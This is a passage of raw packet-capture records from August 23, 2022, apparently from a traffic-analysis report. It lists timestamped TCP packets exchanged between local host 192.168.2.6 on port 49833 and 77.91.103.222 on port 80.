                                                                                                                                                                      Aug 23, 2022 18:26:23.692367077 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692377090 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692385912 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692401886 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692404985 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692414999 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692423105 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692429066 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692442894 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692461967 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692478895 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692480087 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692498922 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692501068 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692517042 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692527056 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692536116 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692550898 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692553997 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692574024 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692574978 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692589045 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692591906 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692601919 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692611933 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692622900 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692629099 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692646980 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692646980 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692662001 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692667007 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692683935 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692684889 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692699909 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692703962 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692712069 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692723036 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692734957 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692740917 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692759991 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692759991 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692773104 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692776918 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692785978 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692794085 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692807913 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692811012 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692821026 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692828894 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692840099 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692847013 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692857027 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692864895 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692871094 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692884922 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692903996 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692920923 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692922115 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692940950 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692944050 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692960024 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692967892 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692976952 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.692994118 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.692996025 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693013906 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693013906 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693032026 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693049908 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693061113 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693064928 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693068027 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693068027 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693083048 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693085909 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693094969 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693104029 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693120003 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693129063 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693136930 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693141937 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693154097 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693167925 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693170071 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693188906 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693193913 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693205118 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693217993 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693223000 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693239927 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693244934 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693257093 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693272114 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693273067 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693289995 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693295002 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693306923 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693316936 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693324089 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693340063 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693346024 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693357944 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693373919 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693373919 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693391085 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693402052 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693407059 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693423986 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693424940 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693442106 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693449974 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693460941 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693476915 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693479061 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693496943 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693499088 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693516970 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693526030 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693535089 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693537951 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693547964 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693561077 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693572998 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693589926 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693608999 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693609953 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693624973 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693629026 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693655014 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693672895 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693675995 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693686962 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693694115 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693698883 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693711042 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693715096 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693728924 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693731070 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693747997 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693753004 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693768978 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693794012 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693809032 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693810940 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693824053 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693829060 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693845034 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693845987 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693861961 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693862915 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693876028 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693878889 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693897009 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693901062 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693912029 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693914890 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693928003 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693928957 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693944931 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693944931 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693958044 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693962097 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693979979 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.693979979 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.693993092 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694000006 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694008112 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694019079 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694027901 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694041014 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694050074 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694058895 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694067955 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694077015 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694083929 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694099903 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694116116 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694118977 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694134951 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694140911 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694153070 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694154024 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694169998 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694170952 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694183111 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694190025 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694200039 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694207907 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694225073 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694242001 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694250107 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694257975 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694267035 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694276094 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694293022 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694295883 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694309950 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694314957 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694327116 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694344044 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694345951 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694360018 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694376945 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694379091 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694394112 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694396973 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694411039 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694416046 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694427967 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694433928 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694446087 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694447994 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694463015 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694466114 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694478989 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694480896 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694494963 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694499016 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694514036 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694514990 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694521904 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694530010 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694547892 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694564104 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694566965 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694581985 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694593906 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694600105 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694617033 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694619894 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694633961 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694643021 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694650888 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694667101 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694670916 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694684029 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694693089 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694700003 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694717884 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694720030 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694735050 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694744110 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694751024 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694767952 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694770098 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694786072 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694792986 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694802999 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694819927 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694820881 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694835901 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694842100 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694853067 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694869995 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694871902 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694886923 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694890976 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694902897 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694916010 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694920063 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694936037 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694941998 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694955111 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694969893 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694972992 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.694988012 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.694993019 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.695005894 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.695022106 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.695039034 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.695039034 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.695044994 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.695055962 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.695075035 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.695075035 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.695091963 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.695092916 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.695107937 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.695116043 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.695126057 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.695128918 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.695142984 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.695152044 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.695161104 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.695173979 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.695178032 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.695184946 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.695194960 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.695204020 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.695231915 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.695242882 CEST4983380192.168.2.677.91.103.222
                                                                                                                                                                      Aug 23, 2022 18:26:23.695291996 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.695311069 CEST804983377.91.103.222192.168.2.6
                                                                                                                                                                      Aug 23, 2022 18:26:23.695329905 CEST4983380192.168.2.677.91.103.222
